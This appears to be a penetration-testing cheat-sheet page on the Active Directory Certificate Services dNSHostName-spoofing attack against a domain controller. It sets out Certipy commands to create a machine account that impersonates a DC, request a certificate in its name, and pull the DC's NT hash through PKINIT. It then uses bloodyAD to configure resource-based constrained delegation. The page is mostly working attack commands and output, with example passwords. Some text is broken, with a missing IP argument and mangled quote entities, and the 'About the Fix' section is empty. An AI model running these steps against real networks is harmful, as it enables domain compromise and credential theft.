dNSHostName Spoofing


If there's an object SID printed when requesting a certificate based on the User or Machine templates, the AD environment is not vulnerable:
$ certipy req megacorp.local/snovvcrash:'Passw0rd!'@CA01.megacorp.local -ca CorpCA -template User
Certipy v3.0.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate
[*] Successfully requested certificate
[*] Request ID is 120
[*] Got certificate with UPN '[email protected]'
[*] Certificate object SID is 'S-1-5-21-1230029644-1443616230-1161330039-2139' <== NOT vulnerable
[*] Saved certificate and private key to 'snovvcrash.pfx'


Create a new machine account with dNSHostName containing FQDN of a DC:
$ certipy account create megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local -user fakemachine -dns DC01.megacorp.local
Request a certificate on behalf of that machine account with spoofed dNSHostName:
$ certipy req megacorp.local/'fakemachine$:UTFWnTqZV4mgGCkz'@CA01.megacorp.local -ca CorpCA -template Machine


Authenticate with the obtained certificate and get DC's NT hash via PKINIT:
$ certipy auth -pfx dc01.pfx -dc-ip

Abuse RBCD

Authenticate with obtained certificate and configure RBCD on a DC via bloodyAD to allow delegation to the fake machine account:
$ openssl pkcs12 -in dc01.pfx -out dc01.pem -nodes
$ python bloodyAD.py -d megacorp.local -c ":dc01.pem" --host setRbcd 'fakemachine#x27; 'DC01#x27;

About the Fix

Last modified 5d ago